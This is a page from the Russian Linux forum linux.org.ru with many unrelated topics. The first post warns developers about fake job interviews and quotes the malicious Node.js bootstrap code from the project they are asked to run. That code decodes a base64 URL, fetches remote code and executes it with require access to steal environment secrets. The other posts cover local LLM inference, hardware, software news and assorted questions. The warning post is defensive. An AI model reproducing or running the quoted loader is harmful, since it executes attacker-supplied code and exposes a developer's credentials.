LINUX.ORG.RU

Форум

Код с сюрпризом или скамеры предлагающие работу

код с сюрпризом, , скамеры

Еще раз напомню, быть осторожнее.

Думаю уже не раз писали про код с сюрпризом, и про то что выходят на интервью. Потом просят запустить код и он крадет env и т.д. Короче только что столкнулся, как было в моем случае: Интервью, никаких вопросов (все адекватно, придраться нету к чему). Во время интервью тебя просят посмотреть проект. Интервьюер просит расшарить экран, заливает код архивом, и если его послать, то заливает на bitbucket. По всей видимости bitbucket выбран именно потому-что оттуда ИИшка в рав режиме код файлы не может загрузить, а получает js, поэтому во время интервью код проверить быстро не получится в автоматическом режиме просто по ссылке.

Далее тебя просят запустить проект, ну и там такое (в моем случае):

server/app.js:11 импортируется:

const {initAppBootstrap} = require('./utils/bootstrap.js');

и в файле server/app.js:44 немедленно выполняется:

initAppBootstrap();

В файле server/utils/bootstrap.js:6-14:

const initAppBootstrap = async () => {
try {
const src = atob(DEV_API_KEY);
const k = atob(process.env.DEV_SECRET_KEY);
const v = atob(process.env.DEV_SECRET_VALUE);
const s = (await axios.get(src, { headers: { [k]: v } })).data.cookies;

const handler = new (Function.constructor)('require', s);

handler(require);

} catch (error) {
console.log(error)

}
}

И файл server/config/bootstrapConfig.js содержит:

DEV_API_KEY: "aHR0cHM6Ly9wYXcucy5neS9uSElsT2Y="

что декодируется в:

https://paw.s.gy/nHIlOf

DEV_API_KEY это закодированный URL.

const s = (...).data.cookies;

const handler = new (Function.constructor)('require', s);
handler(require);

Это может выполнять такие действия, как:

require('fs')
require('child_process')
require('https')
require('os')

Если ты отказываешься, то тебе говорят чтобы ты дал краткое ревью по фичам и чего не хватает и назначают следующее интервью.

Все обосновывается, посмотреть на фичи, проверить умеешь ли ты работать с кодом и т.д., если говорить, что тебе необязательно запускать, чтобы понять что в коде и ты можешь рассказать прямо сейчас, скажите только какую фичу или какой файл и ты отказываешься запускать в live, то вот дают тебе задание дай короткое ревью по фичам и чего не хватает.

Короче, чтобы не тратить время самому делайте клон, пакуйте в архив, даете архив ИИ с таким примерно промтом (не идеальный, но ИИ сойдет):

tell me is there any security leak problems, recently there are some people who like to force you to launch the code that actually do leak envs from running machine. surely later I could check in virtual machine as well, but better if you say what is wrong with it, in case there an issues the potential problem could be in dependencies, not in the codebase

И за две минуты оно уже дает вам ответ и не нужно копаться в этом говнокоде.

Вот для не Ъ: https://chatgpt.com/s/t_6a8ef017c4748191adf3c55bf6582b21

Да если все-таки захочется запустить код, советую виртуальную машину с левым ip или впс, которую можно вайпнуть, вместо контейнера.

Да, если что это необязательно должен быть Node.Js, так что не нужно гнать на него, код может быть на любом ЯП.

P.S: Я хз возможно этому место в Job, а может и нет, если что перенесите.

anonymous_sama
()

Зря удалили

Тема шрифтов исторически была очень животрепещущей для Линукса. Многих расстраивала недоступность соответствующей литературы. Тема https://www.linux.org.ru/forum/talks/18366424 сообщает о том, что положение изменилось. Слишком поздно, но кого-то порадует.

question4
()

DeepSeek v4 Flash local inference

,

DeepSeek v4 Flash

Это модель фронтирного уровня. С выходом версии от 0731 - стала даже лучше по benchmark, но на мой взгляд, это benchmaxing По крайней мере, русский у этой модели стал хуже.

Что нужно для инференса в домашних условиях?

Видеокарта современная NVidia от 16Гб (с поддержкой mxfp4) Память - чем быстрее, тем лучше, желательно DDR5 от 128Гб Камень какой-нибудь хотя бы ядер на 8

Какого результата можно добиться?

• Можно комфортно общаться с сетью, задавать вопросы, получать ответы (замена Google если вопрос касается общеизвестных вещей, фактов итд.)

• Можно добиться неспешного выполнения агентских задач, например, программирование с использованием OpenCode.

Какая скорость ожидается?

Скорость будет зависеть от железа, конечно же, от применения оптимизаций, а так же от квантования модели.

• Скорость prefill (чтение промпта) - сотни токенов в секунду (200+)
  • Скорость decode (генерация) - более 10 токенов в секунду - неспешно читаешь и успеваешь обдумывать прочитанное, но не ждешь жадно каждого токена.

Мое железо

Не так давно я приобрел desktop именно под нейросети, хотя уже 20+ лет я пользовался ноутбуками и не было желания поставить себе в комнату большую шумную коробку. Но все изменилось.

• Процессор Ryzen 9950x3d
  • RAM DDR5-5600 192Гб
  • GPU RTX Pro 4000 Blackwell

Мои результаты

В целом за пару месяцев моих попыток завести эту модель я продвинулся от 8ts до 17ts генерации, от 40ts decode до 360. Сейчас получил такие результаты:

• Неквантованная модель: 11ts генерация (decode) 250ts промптпроцессинг (prefill)
  • iq3xxs квантованная: 14ts генерация (decode) 360ts промптпроцессинг (prefill)

Параметры

"%LLAMA_PATH%\llama-server.exe" ^
    -m "%MODEL_PATH%" ^
    --no-mmap ^
    --no-repack ^
    --device CUDA0 ^
    --main-gpu 0 ^
    --direct-io ^
    --kv-offload ^
    --fit on ^
    --ctx-size 384000 ^
    --cache-type-k q8_0 ^
    --cache-type-v q8_0 ^
    -fa 1 ^
    --mlock ^
    --parallel 1 ^
    --jinja ^
    --chat-template-file "%TEMPLATE_PATH%" ^
    --temp 0.7 ^
    -t 8 ^
    -b 4096 ^
    -ub 4096 ^
    -lv 4 ^
    --host 0.0.0.0 ^
    --port 1234

Как видим, контекст 384000 токенов - это достаточно хороший объем, чтобы комфортно вести разработку, при этом он квантован до q8, что экономит кучу памяти, но наверное немного добавляет забывчивости. Так же подобраны оптимальные параметры -batch -ubatch 4096. Обратите внимание, -t 8 говорит нам о том, что используются всего 8 ядер процессора. Больше нет смысла - потому что все упирается в пропускную способность памяти, сколько ни ставь - прироста скорости не будет, а может быть даже наоборот. Так что экономим электроэнергию, именно она составляет основную стоимость домашнего инференса.

Экономика

Мне лень подключать компьютер через ваттметр в данный момент, хотя если будет запрос - я это сделаю. В моем компьютере стоит блок питания на 1.2КВт, при этом он взят с запасом под несколько видеокарт. Допустим, при инференсе компьютер потребляет 700Вт, на основе этого можно понять, сколько стоит инференс. Стоимость обычно указывается за 1млн токенов. Возьмем за основу данные - 9ts в среднем (к концу контекста скорость обычно падает) decode - 200ts. Электричество возьмем по 5 ₽ (хотя у меня 3.50 ₽). Расчет такой: считаем, сколько часов нужно, чтобы сгенерировать 1млн токенов и умножаем на стоимость электричества, которое потребит компьютер мощностью 0.7КВт.

• Стоимость входных токенов : 1 000 000 / (3600 * 200) * 5 * 0.7 = 4.86 ₽
  • Стоимость выходных токенов : 1 000 000 / (3600 * 9) * 5 * 0.7 = 108.02 ₽
  • Стоимость кэша : в подарок (сложно посчитать)

Что предлагают провайдеры? Например, я сейчас пользуюсь одним провайдером, цены:

• Стоимость входных токенов : 55,75 ₽
  • Стоимость выходных токенов : 167,24 ₽
  • Стоимость кэша : 1,77 ₽

Как видим, получилось даже дешевле!

Но есть еще дополнительная цена - это наличие железа и терпения в ожидании решения задачи. Считаем, что хороший компьютер у вас уже есть. А терпение - это плата за контроль. Здесь вас не отключат, и тем более никто не украдет ваши наработки (да кому они нужны?) Или, постойте… Сейчас идет охота за данными - нейросетевые гиганты скупают книги тоннами и сканируют их, только чтобы накормить свои ненасытные нейросети данными, которых уже сейчас катастрофически не хватает для обучения нейросетей (скормили все, что плохо лежало). Поэтому я не удивлюсь, если провайдеры действительно собирают ваши сессии, а затем продают их в качестве датасетов для обучения нейросетей. Так что куски кода вашего секретного суперпроекта рискуют уже завтра появится в агентской сессии ваших конкурентов.

Как добиться лучших результатов по скорости?

1. Конечно же, купить несколько видеокарт последнего (Blackwell), пред-последнего (Ada), пред-пред-последнего поколений (Ampere), чтобы поднять VRAM до 128-192 Гб.

2. Собрать комп на многоканальной памяти - 4, 8, 12… Пусть даже на DDR4. Например, если взять EPYC с памятью на 8 каналов, получаем пропускную способность 200Гб/с - а это уже сравнимо с Ryzen AI, где пропускная способность в районе 250Гб/с!

Предлагаю делиться своими результатами. Быть может вместе мы сможем придумать, как лучше задействовать потенциал нашего железа.

EvilSpirit
()

elio — ещё один файл-менеджер

, , , ,

Snappy, batteries-included terminal file manager with rich previews, inline images, bulk actions, and trash support

• Three-pane layout — Places, Files, and Preview side by side
  • Rich previews — text, code, documents, archives, media, and more; see Preview Coverage
  • Archive management — extract and create common archive formats
  • Inline images — rendered directly in supported terminals
  • Customizable Places and devices — pinned folders plus auto-detected drives and mounts
  • Quick actions — Go-to, Open With, and copy-to-clipboard
  • Trash management — trash, restore, or permanently delete files
  • Keyboard and mouse navigation — browse comfortably either way
  • Kitty drag and drop — drop files into elio and drag them out in Kitty 0.47+
  • Grid and list views — switch with v, zoom the grid with Ctrl++ / Ctrl+-
  • Fuzzy find — find folders and files quickly
  • Duplicate Finder — find and safely manage files with identical contents
  • Zoxide jumps — jump to frequent directories from your zoxide history
  • Shell integration — install cd-on-exit wrappers for bash, zsh, fish, and Nushell
  • Theming — full palette and file-class control via theme.toml

Интересные обещания:

elio previews many file types:

• Text, source code, Markdown, logs, and structured data such as JSON, YAML, TOML, CSV/TSV, and SQLite
  • Documents such as PDFs, ebooks, Office files, OpenDocument files, and Apple Pages

https://elio-fm.github.io/

(Если кто-нибудь переведёт и сделает новость, то этот топик можно снести, конечно)

(Шесть лет назад, и тоже rust, и тоже консоль, и Fuzzy Search… Broot v1.0.2 (консольная утилита для поиска и манипуляции с файлами))

greenman
()

Анонс игрового процесса ONTOS — преемника SOMA от Frictional Games

, ontos, ,

От разработчиков SOMA, духовный преемник и научно фантастическая игра ONTOS.
Вроде раньше говорили будет в 2026 готово, на странице стима написано 2027.

Игровой процесс и графика

Страничка в стиме, пожелаем фриктикам удачи

Страничка с noDRM в гогсе, пожелаем удачи ещё раз фриктикам

Обновление от Ср 02 сен 2026 14:02:46 MSK

10 Минут игрового процесса

Обновление от Вс 06 сен 2026 17:09:09 MSK

Постройка разработчиком, в своём гараже, крысиного сервера (как в игре) для gamescon

Сомневаюсь что мой компуктер сможет запустить эту игру, но как минимум The Bunker прошёл.

LINUX-ORG-RU
()

The Omacom Foundation планирует потратить 10 миллионов долларов на дистрибутив Omarchy и смежные проекты

, , , ,

Давид Хейнемейер Ханссон (автор веб-фреймворка Ruby on Rails), развивающий дистрибутив Omarchy, объявил о создании фонда Omacom Foundation.

Фонд уже получил финансирование в размере 10 миллионов долларов, которые планируется потратить в ближайшие 5 лет.

Средства фонда пойдут на:

• развитие инфраструктуры Omarchy;
  • маркетинг;
  • спонсирование open-source проектов, от которых зависит Omarchy.

Среди первых проектов, которые получат финансирование:

• Wayland-композитор Hyprland, автору которого будет оплачено 3 года разработки;
  • утилита для управления средствами разработки mise.

Анонс запуска Omacom Foundation

Перемещено dataman из opensource

Belkrr
()

Речевой ввод

, ,

Увидел рекламу от Сбера программы для речевого ввода. Она с телеметрией, хотя они заявляют, что не собирают собственно сам текст, но кто же им поверит. А есть ли решения для действительно приватной расшифровки речи? Интересует русский язык.

den73
()

Посоветуйте что можно опубликовать

, , , ,

Планирую создать публикацию, идея простая - брутфорсом перебираю доменные имена сайтов, жду ответ от днс сервера, если есть айпи пишу в базу данных связку доменное имя и айпи. После завершения будет база данных из которой можно посмотреть имена сайтов. Можно конечно поискать в ней смешные имена и маты на английском или на транслите. На досуге можно будет посерфить эти сайты, потому что мои сайты на которые я хожу уже стали заезженными. Что ещё можно сделать с этим?

Перемещено dataman из general

doomer
()

Backend/Linux-разработчик: API, Docker, Nginx

, , ,

BACKEND / LINUX / DEVOPS

Разработчик с опытом 4+ года. Ищу удалённые проекты и проектную работу в backend-разработке и Linux-инфраструктуре.

Что делаю

• backend и API: Node.js, Express, NestJS, PHP, Laravel;
  • веб-сервисы, личные кабинеты и интеграции;
  • развёртывание и сопровождение Linux-серверов;
  • Docker, Nginx, CI/CD, настройка окружений;
  • скрипты для серверной автоматизации и обработки открытых данных.

Стек

Node.js / Express / NestJS / PHP / Laravel
Linux / Nginx / Docker / CI/CD
Vue 3 / Nuxt / React / TypeScript

Работаю удалённо. Возможны фиксированная стоимость или почасовой формат — оценку и сроки даю после обсуждения задачи.

Связь

Telegram: @WaventCode
Портфолио: t.me/wavent_work

WaventCode
()

Проблемы с mirror.mephi.ru

, ,

Второй день наблюдаю, что зеркала МИФИ не грузятся. это ЧЯДНТ, или что-то случилось, или только у меня из трёх разных мест?

Dispetcher14
()

Гимн линуксоида (собственное сочинение)

, ,

Стояло раньше у меня десятое окно.
Но тормозами все же в край замучило оно.
И как то раз
Настал тот час,
Открыл я дивный мир,
Где майкрософт народа враг,
А опенсорс - кумир.

Накатил я пингвина, не работает то,
Пришлось ввести мне командычей сто.
Заработало то, отвалилось другое,
Но я думаю оно того стоит.
Компилирую я мысли в голове своей,
Про пингвина я трынжу то ему, то ей.
А они с непониманьем крутят у виска,
Участь гика однако нелегка…

Ноутбуку 20 лет, уж в музее место,
Чинить сервис не возьмется (опыт если честно).
Но а я и не расстроен, повертел да покрутил
Оказалось - еще годен, я пингвина накатил.

Вот уж точно наступил линукс головного мозга,
Бегут строчки по экрану и гудит компьютер жоска.
Дергается красный глаз и на нервах тики,
И вот так без приукрас поживают гики.

Линукс там, линукс тут, линукс он везде:
От Вайфая до мобилы, всё назло винде.
А винде капец все ближе, с каждым новым днём.
И тогда каждый узнает об этом всём…

Развиваем с каждым днём мы открытый софт.
Дерёт на бошке волосья злобный Майкрософт,
И с надеждой продолжаем, верим: наконец
Скоро скоро да наступит жданный наш вендекапец!…

Михаил Ионин, 2026.

Mishahack
()

Как работают разветвители USB-C с выходом на HDMI?

,

Нашёл на Озоне вот такое: https://ozon.by/product/usb-hub-3-0-usb-razvetvitel-type-s-na-7-portov-kontsentrator-usb-hab-3636851711/?at=1ruj1O9-mGghIH5QwQMGfcfTFsixxwTa&__rr=1&sh=lkszy08Oug

Решил взять похожий адаптер, а пока он доставляется, задумался, как он будет выводить картинку. В моей ситуации, у меня есть материнка MSI B450 Tomahawk с выходом Type-C. Не знаю, какая ревизия порта, предположим, что USB 3.1. Раз 3.1, то, технически, я должен уметь в Thunderbolt 4 или DisplayPort, но в случае с тем разветвителем у меня будет HDMI. Допустим. Есть также дискретная видеокарта, встроенной графики нет. Что тогда будет выводить картинку по разветвителю через HDMI, если разветвитель тыкнут в материнку без встроенной графики? В разветвителе будет какое-то подобие в видеоадаптера? Если я тыкну в HDMI-порт с разветвителя свой второй монитор, я смогу его увидеть? Как это будет выглядеть в Dmesg?

Tyse_EX
()

#diy микроэлектроника «в гараже»

https://m.youtube.com/watch?v=VHyoz8fFpUM

Гараж конечно с не самой простой начинкой.

Andrew-R
()

Интервью с разработчиками аудиоплагинов TDL

, , , ,

Не так давно разработчики очень крутых пудиоплагинов TDL, среди которых есть россиянин Владислав Гончаров, выпустили нативные Линукс-версии своих плагинов. Я давно использую их софт и в продакшне, и в личных проектах и могу сказать, что их продукты действительно очень хороши в своей нише, на уровне таких монстров, как Waves и Softube, при этом многие плагины имеют «младшие» бесплатные полнофункциональные версии, а платные отличаются весьма скромным ценником.

Недавно известный в среде линукс-музыкантов сайт linuxaudio обратился к ним с просьбой дать интервью. По каким-то причинам оно так и не было опубликовано, но Владислав все же выложил его в Телеграм, где я его с интересом прочитал. Там и про Линукс, и про опенсорс, и про фрагментацию, и про ИИ, и про пиратство, все, как вы любите🙂

Ссылка на пост: https://t.me/tokyodawnlabsru/644

Ссылка на статью: https://telegra.ph/Intervyu-s-razrabotchikami-Tokyo-Dawn-Labs-08-24

Перемещено dataman из general

slepoy_pew
()

Самое точное техническое предсказание на LOR

, ,

Наверное у jackill за фразу, сказанную в 2003-м году:

Имхо пока не начнется использование нейросетей переводчики так и не будут «чувствовать» контекст.

Здесь: Stylus for UNIX (комментарий)

В общем-то так оно и вышло. Хотя не совсем понимаю, что мешало ещё тогда и раньше прикрутить хотя бы байесовский классификатор для выбора нужного словаря из нескольких для конкретного параграфа. Но почему-то так или не делали или совсем не массово. Настройка на конкретную область существовала, но требовала повозиться с подгонкой и расстановкой приоритетов. Впрочем, и не сильно помогло бы.

anonymous_incognito
()

Как запретить чтение системных ID программам?

, ,

Привет, чат!

Два вопроса, от частного к общему.

Частный случай: есть проприетарная прога (сразу уточню, впопенсорцных анало говнет и не предвидится), которая для проверки активации использует мак-адрес сетевой карты, и если тот меняется, активация слетает. На ноутбуке с рандомизированным для приватности маком это, понятное дело, неудобно. Есть ли готовые решения, которые позволят эту херню убрать? Можно через eBPF перехватывать сисколлы или вставлять .so в процессы, но если кто-то уже сделал, будет круто узнать.

Добавлю, прога легально куплена мной, поэтому это вопрос исключительно удобства, к пиратству отношения не имеющий.

Общий вопрос: линукс позволяет юзерспейсным процессам вообще слишком много доступа к разным железным ID, начиная от тех же мак-адресов и заканчивая вагоном разных штук в /sys. Хуже того, с приходом dbus и systemd каждая система имеет уникальный /etc/machine-id за каким-то хером, который доступен вообще каждом программе. Есть ли какой-нибудь более-менее список этих трекеров и рецепты как их заткнуть, не сломав работу зависящего от них кода?

Спасибо, чат.

yorshka
()

Отключить line buffering у /dev/ttyFIQ

,

Проблема Y

Решил попробовать через UART пройти плату с rockchip отладчиком ядра. Вроде всё по инструкции сделал, но упёрся в непонятную ситуацию:

(gdb) target remote /dev/ttyUSB0
Remote debugging using /dev/ttyUSB0
Remote replied unexpectedly to 'vMustReplyEmpty': vMustReplyEmpty

Есть подозрения, что у /dev/ttyFIQ0 включена построчная буферизация, т.к. когда я делаю на устройстве:

# cat /dev/ttyFIQ0

И делаю:

(gdb) target remote /dev/ttyUSB0

По UART явно данные передаются (лампочка мигает), но при этом ничего не выводится. Но если потом сделать:

echo > /dev/ttyUSB0

На устройстве будет что-то вроде:

# cat /dev/ttyFIQ0 
+$qSupported:multiprocess+;swbreak+;hwbreak+;qRelocInsn+;fork-events+;vfork-events+;exec-events+;vContSupported+;QThreadEvents+;QThreadOptions+;no-resumed+;memory-tagging+;xmlRegisters=i386;error-message+#14---+$vCont?#49---+ <дальше опущено>

Проблема X

Следовательно, вопрос: как у /dev/ttyFIQ0 отключить буфферизацию ввода?

# stty -F /dev/ttyFIQ0 
speed 115200 baud; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>;
swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V;
flush = ^O; min = 1; time = 0;
-brkint ixoff -imaxbel

P.s. baudrate правильный, в /etc/inittab консоль отключена.

Jullyfish
()

Enum-ы против таблиц

, ,

Мы говорим про SQL (конкретно про postgree). Enum-ы обычно быстрее, код с ними строже и проще (со стороны бэкенда), но менее гибкие (не удалить значение без миграции и даже там нужны костылики с пересозданием enum-а, не дополнить полями, разные в разных СУБД). Что вы применяете в своих проектах и на основе чего принимаете решение?

peregrine
()

Вайб-кодинг для android для начинающих

,

Какими инструментами посоветуете пользоваться для написания простых приложений на Android с использованием ИИ? Недавно написал программку на python с использованием дикпика, но там был всего один файл. А у android в проекте полно файлов (я даже не разобрался в структуре проекта) Если что, я собираюсь пользоваться личных целей. Работать android-программистом или пушить код в свободные проекты не собираюсь (ну разве что если что полезное напишу, то выложу свой проект на гитхаб с пометкой, что он сгенерирован ИИ).

Wapieth
()

НМ-тех, 130 нм на 200 мм пластинах и 2028 год. На старом оборудовании AMD.

, , , ,

Сабдж

Как стало известно CNews, «НМ-Тех» рассчитывает вывести свое производство «Фаб-200» на проектную мощность в 2028 г. Об этом CNews сообщили в «НМ-Техе».

Речь идет о производстве микроэлектроники на 200-мм кремниевых пластинах. Сейчас «НМ-Тех» заявляет, что освоил технологии по производству чипов 250 и 130 нм, а техпроцесс 90 нм находится в разработке.

В предварительной концепции нового нацпроекта по развитию российской электроники сообщалось, что мощность «НМ-Теха» составит 15 тыс. пластин в месяц.

В августе 2023 г. ВЭБ.РФ открыл «НМ-Теху» кредитную линию на 116,4 млрд руб. для финансирования приобретения оборудования, пусконаладки и запуска производства. Кредит должен быть возвращен не позднее конца 2027 г.

По данным пояснительной записки к бухгалтерскому отчету компании за 2024 г., затраты на постановку технологий по итогам 2023 г. составили 14,99 млрд руб.

Сейчас компания ведет реконструкцию и техническое перевооружение завода по производству микроэлектроники в Зеленограде. Производство запускается на базе обанкротившегося «Ангстрема-Т». При этом часть оборудования, приобретенного еще «Ангстрем-Т», изначально была бывшей в употреблении: оборудование для фабрики закупалось у AMD.

В марте 2023 г. компания опубликовала на портале госзакупок тендер стоимостью 18,5 млн руб. на закупку 2,5 тыс. кремниевых 200-миллиметровых пластин (используются для печати чипов по топологиям до 90 нм).

В начале 2026 г. «НМ-Тех» опубликовал тендер на лабораторные испытания для контроля качества монтажа чистого производственного помещения на заводе.

Выход «Фаб-200» на проектную мощность даст российской микроэлектронике еще одну крупную площадку полного цикла на пластинах 200 мм, рассказал CNews эксперт НТИ по технологиям Леонид Дробышевич. В России уже есть производство на 200-мм пластинах, организованное на «Микроне» (входит в «Элемент»).

«Особенно важен контрактный формат: отечественные дизайн-центры и компании без собственных фабрик смогут заказывать выпуск разработанных ими микросхем внутри страны, — продолжает эксперт. — Пластины этого диаметра по-прежнему широко используются в мире для массового производства микроконтроллеров, аналоговых и силовых компонентов».

Но могут быть и сложности с реализацией планов. По мнению Дробышевича, самая трудная часть проекта начинается после монтажа оборудования. «Нужно добиться устойчивого выхода годных кристаллов, повторяемости характеристик от партии к партии и пройти квалификацию изделий у заказчиков, — продолжает он. — Сохраняется зависимость от обслуживания импортных установок, запасных частей, кремниевых пластин, фоторезистов, газов и сверхчистой химии».

С тем, что для российской промышленности сегмент по выпуску широкого спектра специализированных микросхем на 200-мм кремниевых пластинах имеет важное значение согласен и руководитель проектов холдинга SNDGLOBAL Константин Лапотко. Эксперт отметил, что российский спрос на мощности свыше 90 нм оценивается примерно в 30 тыс. 200-мм эквивалентных пластин в месяц, тогда как фактическая загрузка имеющихся мощностей оценивается примерно в 8 тыс. пластин в месяц.

Завод сможет выпускать широкий портфель компонентов, говорит Лапотко. В их числе уже заявлены аналогово-цифровые преобразователи, силовые транзисторы и защищенный микроконтроллер NMT32 Smart на открытой архитектуре RISC-V, продолжает он.

При этом эксперт напоминает, что часть мощностей «НМ-Теха» были куплены у AMD и с одной стороны это позволило компании не начинать проект с нуля, а с другой — есть необходимость восстановить, модернизировать, обеспечить запасными частями, метрологией, сервисом и интегрировать в актуальный технологический маршрут это оборудование.

Хай, будет. Чо б нет-то? Больше производств, хороших и разных!

tiinn
()

RSS подписка на новые темы